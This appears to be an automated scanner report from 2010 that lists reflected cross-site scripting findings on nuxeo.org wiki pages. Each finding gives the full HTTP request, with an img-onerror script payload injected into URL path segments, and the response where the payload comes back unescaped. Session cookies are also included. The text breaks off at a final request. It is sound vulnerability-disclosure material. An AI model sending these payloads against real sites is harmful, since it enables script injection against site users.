GET /xwiki/bin/view/Main/NuxeoDevGettingStartedf7c6d<img%20src%3da%20onerror%3dalert(1)>83bdae15118 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:30 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13054 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStartedf7c6d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E83bdae15118'>NuxeoDevGettingStartedf7c6d<img src=a onerror=alert(1)>83bdae15118</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b0a6"><img%20src%3da%20onerror%3dalert(1)>2f680be3ffe was submitted in the REST URL parameter 5. This input was echoed as 3b0a6"><img src=a onerror=alert(1)>2f680be3ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/NuxeoDevGettingStarted3b0a6"><img%20src%3da%20onerror%3dalert(1)>2f680be3ffe HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:41 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13116 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/NuxeoDevGettingStarted3b0a6%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E2f680be3ffe?format=xar&name=Main.NuxeoDevGettingStarted3b0a6"><img src=a onerror=alert(1)>2f680be3ffe&pages=Main.NuxeoDevGettingStarted3b0a6"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6520f<img%20src%3da%20onerror%3dalert(1)>b3521d0e8d was submitted in the REST URL parameter 4. This input was echoed as 6520f<img src=a onerror=alert(1)>b3521d0e8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main6520f<img%20src%3da%20onerror%3dalert(1)>b3521d0e8d/NuxeoProdSetup HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:12 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12949 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main6520f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb3521d0e8d/">Main6520f<img src=a onerror=alert(1)>b3521d0e8d</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6ecb"><img%20src%3da%20onerror%3dalert(1)>3570ded39b1 was submitted in the REST URL parameter 4. This input was echoed as b6ecb"><img src=a onerror=alert(1)>3570ded39b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Mainb6ecb"><img%20src%3da%20onerror%3dalert(1)>3570ded39b1/NuxeoProdSetup HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:21 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13028 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Mainb6ecb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3570ded39b1/NuxeoProdSetup?format=xar&name=Mainb6ecb"><img src=a onerror=alert(1)>3570ded39b1.NuxeoProdSetup&pages=Mainb6ecb"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f690<img%20src%3da%20onerror%3dalert(1)>550971a196c was submitted in the REST URL parameter 5. This input was echoed as 5f690<img src=a onerror=alert(1)>550971a196c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/NuxeoProdSetup5f690<img%20src%3da%20onerror%3dalert(1)>550971a196c HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:42 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12950 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup5f690%3Cimg+src%3Da+onerror%3Dalert%281%29%3E550971a196c'>NuxeoProdSetup5f690<img src=a onerror=alert(1)>550971a196c</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a30eb"><img%20src%3da%20onerror%3dalert(1)>02bbce0edfd was submitted in the REST URL parameter 5. This input was echoed as a30eb"><img src=a onerror=alert(1)>02bbce0edfd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/NuxeoProdSetupa30eb"><img%20src%3da%20onerror%3dalert(1)>02bbce0edfd HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:44 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13012 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/NuxeoProdSetupa30eb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E02bbce0edfd?format=xar&name=Main.NuxeoProdSetupa30eb"><img src=a onerror=alert(1)>02bbce0edfd&pages=Main.NuxeoProdSetupa30eb"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95666<img%20src%3da%20onerror%3dalert(1)>e1bfc44a519 was submitted in the REST URL parameter 4. This input was echoed as 95666<img src=a onerror=alert(1)>e1bfc44a519 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main95666<img%20src%3da%20onerror%3dalert(1)>e1bfc44a519/QuickStart53 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:14 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12936 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main95666%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee1bfc44a519/">Main95666<img src=a onerror=alert(1)>e1bfc44a519</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce6a9"><img%20src%3da%20onerror%3dalert(1)>8481e731c33 was submitted in the REST URL parameter 4. This input was echoed as ce6a9"><img src=a onerror=alert(1)>8481e731c33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Maince6a9"><img%20src%3da%20onerror%3dalert(1)>8481e731c33/QuickStart53 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:18 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13002 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Maince6a9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8481e731c33/QuickStart53?format=xar&name=Maince6a9"><img src=a onerror=alert(1)>8481e731c33.QuickStart53&pages=Maince6a9"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1701<img%20src%3da%20onerror%3dalert(1)>f3296b02031 was submitted in the REST URL parameter 5. This input was echoed as b1701<img src=a onerror=alert(1)>f3296b02031 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/QuickStart53b1701<img%20src%3da%20onerror%3dalert(1)>f3296b02031 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:43 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12924 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53b1701%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef3296b02031'>QuickStart53b1701<img src=a onerror=alert(1)>f3296b02031</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b69f"><img%20src%3da%20onerror%3dalert(1)>e4df32fa359 was submitted in the REST URL parameter 5. This input was echoed as 7b69f"><img src=a onerror=alert(1)>e4df32fa359 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/QuickStart537b69f"><img%20src%3da%20onerror%3dalert(1)>e4df32fa359 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:52 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12986 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/QuickStart537b69f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee4df32fa359?format=xar&name=Main.QuickStart537b69f"><img src=a onerror=alert(1)>e4df32fa359&pages=Main.QuickStart537b69f"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f559<img%20src%3da%20onerror%3dalert(1)>c8142c250a6 was submitted in the REST URL parameter 4. This input was echoed as 6f559<img src=a onerror=alert(1)>c8142c250a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main6f559<img%20src%3da%20onerror%3dalert(1)>c8142c250a6/RssFeeds HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:47 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12884 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main6f559%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec8142c250a6/">Main6f559<img src=a onerror=alert(1)>c8142c250a6</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b1d"><img%20src%3da%20onerror%3dalert(1)>62f3be97fdf was submitted in the REST URL parameter 4. This input was echoed as 44b1d"><img src=a onerror=alert(1)>62f3be97fdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main44b1d"><img%20src%3da%20onerror%3dalert(1)>62f3be97fdf/RssFeeds HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:57 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12950 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main44b1d%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E62f3be97fdf/RssFeeds?format=xar&name=Main44b1d"><img src=a onerror=alert(1)>62f3be97fdf.RssFeeds&pages=Main44b1d"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54448"><img%20src%3da%20onerror%3dalert(1)>a9dc78f1bed was submitted in the REST URL parameter 5. This input was echoed as 54448"><img src=a onerror=alert(1)>a9dc78f1bed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/RssFeeds54448"><img%20src%3da%20onerror%3dalert(1)>a9dc78f1bed HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:15 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12934 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/RssFeeds54448%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea9dc78f1bed?format=xar&name=Main.RssFeeds54448"><img src=a onerror=alert(1)>a9dc78f1bed&pages=Main.RssFeeds54448"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 631e7<img%20src%3da%20onerror%3dalert(1)>6c56452ca3f was submitted in the REST URL parameter 5. This input was echoed as 631e7<img src=a onerror=alert(1)>6c56452ca3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/RssFeeds631e7<img%20src%3da%20onerror%3dalert(1)>6c56452ca3f HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:03 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12872 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds631e7%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6c56452ca3f'>RssFeeds631e7<img src=a onerror=alert(1)>6c56452ca3f</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c472"><img%20src%3da%20onerror%3dalert(1)>24ed474cd68 was submitted in the REST URL parameter 4. This input was echoed as 8c472"><img src=a onerror=alert(1)>24ed474cd68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main8c472"><img%20src%3da%20onerror%3dalert(1)>24ed474cd68/Tags HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
